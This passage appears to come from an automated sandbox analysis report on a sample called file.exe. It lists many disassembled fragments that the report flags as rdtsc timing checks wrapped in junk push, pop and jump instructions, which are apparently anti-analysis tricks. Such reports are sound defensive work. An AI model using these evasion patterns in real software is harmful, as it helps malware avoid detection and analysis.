            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6D25 second address: 8B6D4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F84084B163Eh 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6EA8 second address: 8B6EE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F8408BD9DB5h 0x0000000c pop esi 0x0000000d jmp 00007F8408BD9DB9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6EE2 second address: 8B6EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7213 second address: 8B7218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE3EF second address: 8BE3FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F84084B1626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE3FB second address: 8BE415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F8408BD9DA6h 0x00000009 jmp 00007F8408BD9DADh 0x0000000e popad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C102B second address: 8C103C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B162Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C103C second address: 8C1046 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1046 second address: 8C104D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1356 second address: 8C136A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F8408BD9DA6h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C136A second address: 8C1383 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F84084B162Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1383 second address: 8C138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C138E second address: 8C1392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7DEB second address: 8C7DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7DF4 second address: 8C7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6669 second address: 8C666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C666F second address: 8C667A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C667A second address: 8C66AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F8408BD9DC3h 0x0000000f jns 00007F8408BD9DA6h 0x00000015 jmp 00007F8408BD9DB7h 0x0000001a push ecx 0x0000001b jg 00007F8408BD9DA6h 0x00000021 pop ecx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6800 second address: 8C6804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6E2D second address: 8C6E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8408BD9DA6h 0x00000009 jnl 00007F8408BD9DA6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6E45 second address: 8C6E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87390E second address: 873915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6F9C second address: 8C6FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6FA2 second address: 8C6FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBBF4 second address: 8CBBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBBF8 second address: 8CBC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d jns 00007F8408BD9DA6h 0x00000013 pop eax 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB3BB second address: 8CB3D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84084B1632h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB3D8 second address: 8CB3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB3DE second address: 8CB3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F84084B162Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7DAA second address: 8D7DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F8408BD9DAEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F8408BD9DA8h 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 jnc 00007F8408BD9DA6h 0x0000001d jmp 00007F8408BD9DACh 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D64E6 second address: 8D64EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D64EC second address: 8D64F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6E12 second address: 8D6E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6E18 second address: 8D6E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8408BD9DAFh 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6E2E second address: 8D6E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D711D second address: 8D7136 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8408BD9DABh 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7136 second address: 8D713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D713A second address: 8D7150 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8408BD9DAEh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7150 second address: 8D7156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7156 second address: 8D715C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D715C second address: 8D7160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7433 second address: 8D7437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7437 second address: 8D7453 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84084B1626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84084B162Fh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A33 second address: 8D7A42 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8408BD9DAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A42 second address: 8D7A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F84084B162Eh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A59 second address: 8D7A77 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d ja 00007F8408BD9DA6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 jnl 00007F8408BD9DA8h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A77 second address: 8D7A7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A7C second address: 8D7A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A89 second address: 8D7A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB30C second address: 8DB310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB44C second address: 8DB45A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F84084B1628h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB5C2 second address: 8DB5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB5C6 second address: 8DB5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F84084B1626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB5D6 second address: 8DB5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DAAh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB730 second address: 8DB736 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E06DB second address: 8E0703 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8408BD9DAEh 0x00000008 jc 00007F8408BD9DA6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F8408BD9DB4h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E752D second address: 8E7533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7533 second address: 8E7537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7537 second address: 8E7554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1639h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7973 second address: 8E7979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7979 second address: 8E79E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F84084B1638h 0x0000000d pop ebx 0x0000000e jmp 00007F84084B1631h 0x00000013 jmp 00007F84084B1633h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007F84084B1626h 0x00000023 jmp 00007F84084B1637h 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E79E0 second address: 8E79E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E79E4 second address: 8E79FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B162Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F84084B1628h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7B7F second address: 8E7B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F8408BD9DACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7B99 second address: 8E7BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F84084B162Ah 0x0000000d jmp 00007F84084B1639h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7ECC second address: 8E7EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 je 00007F8408BD9DA6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7EE0 second address: 8E7EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B1632h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8027 second address: 8E8036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DAAh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8036 second address: 8E803C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E81AD second address: 8E81B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1318 second address: 8F131E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F131E second address: 8F1324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1324 second address: 8F1337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F84084B1632h 0x0000000b jo 00007F84084B1626h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1337 second address: 8F133B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900460 second address: 900491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F84084B1626h 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F84084B1626h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F84084B1630h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jbe 00007F84084B1636h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900491 second address: 900499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFE2E second address: 8FFE3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84084B162Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFE3D second address: 8FFE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DB5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFE58 second address: 8FFE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F84084B1626h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFE66 second address: 8FFE6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFE6C second address: 8FFE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFE72 second address: 8FFE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007F8408BD9DC6h 0x0000000d jo 00007F8408BD9DB4h 0x00000013 jmp 00007F8408BD9DAEh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFFF4 second address: 8FFFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFFFA second address: 900019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DB7h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900019 second address: 90001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90696E second address: 906974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906974 second address: 906982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jns 00007F84084B1626h 0x0000000d pop ecx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906982 second address: 90699B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8408BD9DA6h 0x00000009 jg 00007F8408BD9DA6h 0x0000000f jne 00007F8408BD9DA6h 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914D29 second address: 914D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914D2D second address: 914D3D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8408BD9DA6h 0x00000008 jng 00007F8408BD9DA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914BB5 second address: 914BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914BB9 second address: 914BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 918574 second address: 918585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F84084B162Ch 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 918585 second address: 91858A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E194 second address: 91E198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E198 second address: 91E1C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8408BD9DA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F8408BD9DC0h 0x00000012 jmp 00007F8408BD9DB4h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CEAC second address: 91CEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CFE7 second address: 91D006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DB6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D006 second address: 91D00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
